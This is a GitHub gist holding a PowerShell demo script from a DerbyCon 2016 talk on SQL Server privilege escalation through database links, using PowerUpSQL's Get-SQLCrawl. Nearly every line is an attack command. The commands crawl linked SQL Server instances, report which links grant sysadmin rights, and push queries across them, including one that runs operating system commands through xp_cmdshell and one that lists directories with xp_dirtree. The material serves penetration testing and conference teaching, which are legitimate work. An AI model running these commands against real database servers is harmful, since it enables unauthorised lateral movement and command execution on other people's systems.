Last active
June 16, 2020 15:44
-
-
Save nullbind/4964b76126ea484cb3094697f611cf8b to your computer and use it in GitHub Desktop.
DerbyCon2016 - SQL Server Privilege Escalation Demo - Database Links
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Import the module | |
| Import-Module C:\PowerUpSQL-master\scripts\Get-SqlServerLinkCrawl.ps1 | |
| # Crawling Links - this show link paths in output | |
| Get-SqlCrawl -Verbose -Instance MSSQLSRV04.demo.local\SQLSERVER2014 -Export | Export-Clixml C:\PowerUpSQL-master\crawl2.xml | |
| # Crawling Links - this will store link paths in an array so they can be used in differant ways | |
| Get-SqlCrawl -Verbose -Instance MSSQLSRV04.demo.local\SQLSERVER2014 | Export-Clixml C:\PowerUpSQL-master\crawl2.xml | |
| # More Example commands below from Antti Rantasaari | |
| Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" | |
| Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" | select name,version,path,links,user,sysadmin,customquery | format-table | |
| Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" | where name -ne "Broken Link" | select name,version,path,links,user,sysadmin,customquery | format-table | |
| Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "exec master..xp_cmdshell 'whoami'" | format-table | |
| Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "exec xp_dirtree 'c:\temp'" -Export | format-table | |
| Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" -Export | where name -ne "broken link" | sort name | Format | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment